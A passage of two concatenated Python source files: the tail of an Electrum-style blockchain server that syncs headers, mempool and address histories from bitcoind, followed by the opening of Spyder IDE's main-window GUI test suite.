postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach bitcoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("bitcoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
# "timestamp": timegm(strptime(datetime.fromtimestamp(b.get('time')), "%Y-%m-%d %H:%M:%S %Z")),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
# return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
return rev_hex(HashX13(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
h = self.get_unconfirmed_history(addr)
return sum([x[1] for x in h])
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
print_log(traceback.format_exc())
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get if from cache. if not, add request to queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException, e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Bitcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("bitcoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run bitcoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
except BaseException, e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
unconfirmed = set()
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
unconfirmed.add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_unconfirmed[tx_hash] = unconfirmed
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
from distutils.version import LooseVersion
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock, MagicMock
import uuid
# Third party imports
from flaky import flaky
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.app import start
from spyder.app.mainwindow import MainWindow
from spyder.config.base import get_home_dir, get_conf_path, get_module_path
from spyder.config.manager import CONF
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, to_text_string
from spyder.utils.misc import remove_backslashes
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
"""Get a reference to the thirdparty plugin with the title given."""
for plugin in main_window.thirdparty_plugins:
try:
# New API
if plugin.get_name() == plugin_title:
return plugin
except AttributeError:
# Old API
if plugin.get_plugin_title() == plugin_title:
return plugin
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
"""Main Window fixture"""
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Check if we need to preload a project in a give test
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project
project_path = str(tmpdir.mkdir('test_project'))
project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project
filenames = [
osp.join(project_path, f) for f in
['file1.py', 'file2.py', 'file3.txt']
]
for filename in filenames:
with open(filename, 'w') as f:
if osp.splitext(filename)[1] == '.py':
f.write("def f(x):\n"
" return x\n")
else:
f.write("Hello world!")
project.set_recent_files(filenames)
else:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, force=True)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print info page content is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def remove_test_dir():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
request.addfinalizer(remove_test_dir)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.single_instance
@pytest.mark.skipif(os.environ.get('CI', None) is None,
reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.interface_locked
# Restore default state
action.trigger()
assert main_window.interface_locked
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
# Undock action
file_explorer._undock_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is not None
assert isinstance(file_explorer._undocked_window, PluginWindow)
assert file_explorer._undocked_window.centralWidget() == file_explorer
# Dock action
file_explorer._dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is None
# Close action
file_explorer._close_plugin_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer._toggle_view_action.isChecked()
# Toggle view action
file_explorer._toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/man'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
